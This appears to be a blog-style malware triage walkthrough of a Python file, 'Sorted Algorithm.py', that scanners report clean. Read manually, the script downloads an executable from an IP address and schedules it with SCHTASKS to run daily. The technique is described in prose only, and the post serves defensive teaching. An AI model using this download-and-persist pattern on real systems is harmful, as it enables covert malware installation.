Our co-worker Helena has just reached out to us saying she got this Python file online that claims to fix a problem she has been having with her tasks. She wants us to take a look at it this file and confirm if its good for use or not.
As the security analyst in the team, its our task to determine if this Python file is good for use or not.
Lets INVESTIGATE!!!
So this Python file is called “Sorted Algorithm.py” and has SHA256 hash of:
255392992bf103d218466399d670300453a69f24398b02f316a74826c1f95a82
Using this hash as a guide, we run a search across Online Malware scanners such as Virus Total, Hybrid Analysis, Any run etc.
Virus Total Results:
Hybrid Analysis Result:
Both Virus Total and Hybrid Analysis has reported this python file as clean but should we stop here and tell Helena
the python file is good for use?
Or
Should we dig deeper?
How about we check the content of this python file and see if anything is amiss before concluding that this file is clean?
Lets see what is in this python file with a notepad, shall we?
From the content of the python file we see some interesting things in the script. I wont pretend that I understand what this code does in its entirety, but we do see at the bottom of the script that there is a http request to an IP address calling for the download of a windows executable “x86_x64_setup.exe”.
Also we see the command “SCHTASKS /CREATE”. Schtasks.exe is a legitimate executable file developed by Microsoft Corporation. This process is known as Manage Scheduled Tasks and it belongs to Windows Operating System. It is commonly stored in C:\Windows\System32 and it has been called upon to create a scheduled tasks for this “x86_x64_setup.exe” executable to run daily at 11:00.
Hmmmmmm…..Now that’s strange?
Why is this Python script requesting for an executable from an IP and also making this persistent with the aid of the scheduled tasks? This is similar to what a malicious script would do.
Lets check the reputation of this IP address nonetheless;
Virus Total IP Result:
Any.run (Online Sandbox for Dynamic Analysis):
Cisco Talos Intelligence Result:
From the Above IP reputation searches, 4 malware engines on Virus Total flagged this IP as being malicious but our search on any.run and cisco talos intelligence came out clean.
In summary
Although, we have seen that this python file does not trigger on any of our Antivirus Engines searches at first. However, when we parse through the script we see it makes an outbound connection to an IP address with a fairly bad reputation to download an executable that is scheduled to run daily at 11:00.
At this junction, we pass a vote of no confidence in our analysis note to Helena as this mimics what a typical malware will do to maintain persistence.
#Always dig a little deeper